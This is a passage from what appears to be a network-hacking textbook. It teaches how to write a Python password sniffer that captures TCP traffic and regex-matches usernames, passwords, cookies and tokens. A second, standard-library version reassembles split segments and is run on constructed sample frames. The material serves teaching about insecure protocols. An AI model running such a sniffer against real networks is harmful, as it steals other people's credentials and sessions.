Understanding Network Hacks

5.4 Password Sniffer

The danger of unencrypted protocols is most effectively demonstrated with the help of a password sniffer. Even people who "do not have anything to hide" recognize that the interception of their username and password endangers their privacy, and they would like to avoid it if possible. Therefore we will now write a program that hunts for username and password combinations by matching predefined strings against the packet payload and dumps them on the display. To do so, we need to adapt the source code of Sect. 5.2 only a little.

#!/usr/bin/python
# Password sniffer: print strings that look like credentials in TCP payloads.
# Written against the Python 2 versions of pcapy and impacket used in the book;
# the print_function import and the payload decoding keep it running on Python 3.

from __future__ import print_function

import sys
import re
import getopt
import pcapy
from impacket import ImpactPacket
from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder

# Interface to sniff on
dev = "eth0"

# Pcap filter
pcap_filter = "tcp"

# Decoder for all layers
eth_dec = EthDecoder()
ip_dec = IPDecoder()
tcp_dec = TCPDecoder()

# Patterns that match usernames, passwords and session identifiers.
# re.VERBOSE allows the pattern to be spread over several lines; without it
# the line breaks inside the triple-quoted string would become part of the
# alternatives. The separator class [=:\s] covers "USER bob", "login=bob"
# and "Authorization: Basic ...". The match stops at the end of the line.
pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS|
                                    PASSWORD|LOGIN|BENUTZER|PASSWORT|
                                    AUTH|AUTHORIZATION|COOKIE|
                                    ACCESS|ACCESS_?KEY|SESSION|
                                    SESSION_?KEY|TOKEN)[=:\s][^\r\n]+)""",
                     re.MULTILINE | re.IGNORECASE | re.VERBOSE)


# This function will be called for every packet, decode it and
# try to find a username or password in it
def handle_packet(hdr, data):
    eth_pkt = eth_dec.decode(data)
    # The filter "tcp" also matches TCP over IPv6, which IPDecoder cannot parse
    if eth_pkt.get_ether_type() != ImpactPacket.IP.ethertype:
        return
    ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string())
    tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string())
    # TCP payload only; the IP payload would also contain the TCP header bytes
    payload = tcp_pkt.get_data_as_string()
    if not isinstance(payload, str):      # bytes on Python 3
        payload = payload.decode("latin-1")

    # Handshake and teardown segments carry no credentials
    if tcp_pkt.get_SYN() or tcp_pkt.get_RST() or tcp_pkt.get_FIN():
        return

    match = pattern.search(payload)
    if match:
        print("%s:%d -> %s:%d" % (ip_pkt.get_ip_src(),
                                   tcp_pkt.get_th_sport(),
                                   ip_pkt.get_ip_dst(),
                                   tcp_pkt.get_th_dport()))
        print("  %s" % match.group("found"))


def usage():
    print(sys.argv[0] + " -i <dev> -f <pcap_filter>")
    sys.exit(1)


# Parsing parameter
try:
    cmd_opts = "f:i:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == "-f":
        pcap_filter = opt[1]
    elif opt[0] == "-i":
        dev = opt[1]
    else:
        usage()

# Start sniffing: snaplen 1500 bytes, promiscuous mode off (pass 1 to also
# capture traffic of other hosts on a shared segment), 100 ms read timeout
pcap = pcapy.open_live(dev, 1500, 0, 100)
pcap.setfilter(pcap_filter)
print("Sniffing passwords on " + str(dev))
pcap.loop(0, handle_packet)

This time we filter TCP traffic, because the cleartext login protocols we are after (FTP, Telnet, POP3, IMAP, SMTP and HTTP) all run on top of TCP. That is a simplification rather than a rule: UDP based protocols such as RADIUS, SNMP or SIP carry authentication data as well, and the filter can be widened with the -f option, but the string patterns below are written with the TCP protocols in mind.

For the decoders we additionally define an IPDecoder and a TCPDecoder to extract the IP and TCP headers in the function handle_packet. Each decoder is fed the payload of the previous layer: the IPDecoder gets the data of the Ethernet frame, the TCPDecoder the data of the IP packet, and so forth.

The packet payload can be accessed as a string with the method get_data_as_string(). Dumping it directly often produces ugly undisplayable characters, especially for binary data, so we first match the payload against a regular expression (Sect. 3.9) to make sure it contains a string like User, Pass, Password or Login, and print only the matching part. In contrast to regular password sniffers, ours does not just search in predefined protocols but in all TCP traffic, and it tries to detect other authentication mechanisms like session keys, tokens and cookies besides username and password combinations. The price for this generality is false positives (any line starting with one of the keywords is reported) and misses: a credential split across two TCP segments is not seen, because each packet is inspected on its own without stream reassembly, and encrypted traffic such as SSH or TLS yields nothing at all.
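The same detection logic, as an added example that is not part of the book's code: it parses raw Ethernet/IPv4/TCP frames with the standard library only (no pcapy or impacket), uses re.VERBOSE so the multi-line pattern behaves as intended, and keeps a small per-flow buffer of the unterminated tail so that a credential split across two segments is still caught and a request body without a trailing newline is flushed when the connection closes. All names (parse_tcp_segment, CredentialSniffer, build_frame, demo), the sample addresses and the credentials are made up for the example; the frames are constructed in build_frame, so it runs offline.

```python
import re
import socket
import struct

# Added example, not the book's code: standard-library credential matcher over
# raw Ethernet frames, with constructed sample traffic (see demo()).
ETH_HDR = struct.Struct("!6s6sH")
ETHERTYPE_IPV4 = 0x0800
FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10

# Same keywords as the chapter's pattern (plus AUTHORIZATION and COOKIE).
# re.VERBOSE makes the line breaks in the triple-quoted string insignificant;
# without it "PASS|\nPASSWORD" would be two broken alternatives.
CRED_PATTERN = re.compile(rb"""
    (?P<found>
        (USER|USERNAME|PASS|PASSWORD|LOGIN|BENUTZER|PASSWORT|
         AUTH|AUTHORIZATION|COOKIE|ACCESS|ACCESS_?KEY|
         SESSION|SESSION_?KEY|TOKEN)
        [=:\s][^\r\n]+
    )""", re.IGNORECASE | re.VERBOSE)


def parse_tcp_segment(frame):
    """(src, sport, dst, dport, flags, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < ETH_HDR.size + 20:
        return None
    _dst_mac, _src_mac, ethertype = ETH_HDR.unpack_from(frame)
    if ethertype != ETHERTYPE_IPV4:          # IPv6, ARP, ...: not handled here
        return None
    ip = frame[ETH_HDR.size:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack_from("!H", ip, 2)[0]
    if ip[0] >> 4 != 4 or ip[9] != 6 or ihl < 20 or not (ihl <= total_len <= len(ip)):
        return None
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:total_len]                  # total_len drops Ethernet padding
    if len(tcp) < 20:
        return None
    sport, dport, _seq, _ack, off_flags = struct.unpack_from("!HHIIH", tcp)
    doff = (off_flags >> 12) * 4
    if doff < 20 or doff > len(tcp):
        return None
    return src, sport, dst, dport, off_flags & 0x1FF, tcp[doff:]


class CredentialSniffer:
    """Scans terminated lines per flow; the unterminated tail waits for more data."""

    def __init__(self, max_tail=4096):
        self.tails = {}
        self.max_tail = max_tail

    @staticmethod
    def _scan(flow, data):
        return [(flow, m.group("found").decode("latin-1", "replace"))
                for m in CRED_PATTERN.finditer(data)]

    def feed(self, frame):
        """Process one frame; return the list of (flow, credential) found."""
        seg = parse_tcp_segment(frame)
        if seg is None:
            return []
        src, sport, dst, dport, flags, payload = seg
        flow = (src, sport, dst, dport)
        if flags & SYN:                      # handshake never carries credentials
            return []
        buf = self.tails.pop(flow, b"") + payload
        if flags & (FIN | RST):              # closing: nothing more will arrive
            return self._scan(flow, buf)
        cut = buf.rfind(b"\n") + 1           # 0 if there is no complete line yet
        found = self._scan(flow, buf[:cut])
        tail = buf[cut:]
        if len(tail) > self.max_tail:        # stop waiting for a line terminator
            found += self._scan(flow, tail)
        elif tail:
            self.tails[flow] = tail
        return found


def build_frame(src, sport, dst, dport, flags, payload, seq=1):
    """Constructed Ethernet/IPv4/TCP frame for offline testing (checksums left 0)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0,
                      (5 << 12) | flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return ETH_HDR.pack(b"\xaa" * 6, b"\xbb" * 6, ETHERTYPE_IPV4) + ip


def demo():
    """Feed constructed traffic through the sniffer and return what it found."""
    c, ftp, web, tls = "10.0.0.5", "10.0.0.1", "10.0.0.2", "10.0.0.3"
    frames = [
        build_frame(c, 40000, ftp, 21, SYN, b""),                 # handshake: skipped
        build_frame(c, 40000, ftp, 21, ACK, b"USER alice\r\n"),
        build_frame(c, 40000, ftp, 21, ACK, b"PASS s3c"),         # password split
        build_frame(c, 40000, ftp, 21, ACK, b"ret\r\n"),          # over two segments
        build_frame(c, 40001, web, 80, ACK,
                    b"POST /signin HTTP/1.1\r\nHost: example.test\r\n\r\n"
                    b"login=bob&password=hunter2"),               # no trailing newline
        build_frame(c, 40001, web, 80, FIN | ACK, b""),           # ... flushed on FIN
        build_frame(c, 40002, tls, 443, ACK, bytes(range(256))),  # binary: no match
        b"\xaa" * 6 + b"\xbb" * 6 + b"\x86\xdd" + b"\x60" + b"\x00" * 39,  # IPv6
    ]
    sniffer, found = CredentialSniffer(), []
    for frame in frames:
        found.extend(sniffer.feed(frame))
    return found   # [(flow, "USER alice"), (flow, "PASS s3cret"), (flow, "login=bob&password=hunter2")]
```

Running demo() reports the FTP username, the password that arrived in two pieces, and the HTTP form body that only became complete when the FIN arrived; the binary flow and the IPv6 frame produce nothing. Ethernet trailer padding is cut off via the IP total length, so stray padding bytes never reach the matcher, and a deliberately bogus IP header length or TCP data offset makes parse_tcp_segment return None instead of misreading the payload.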
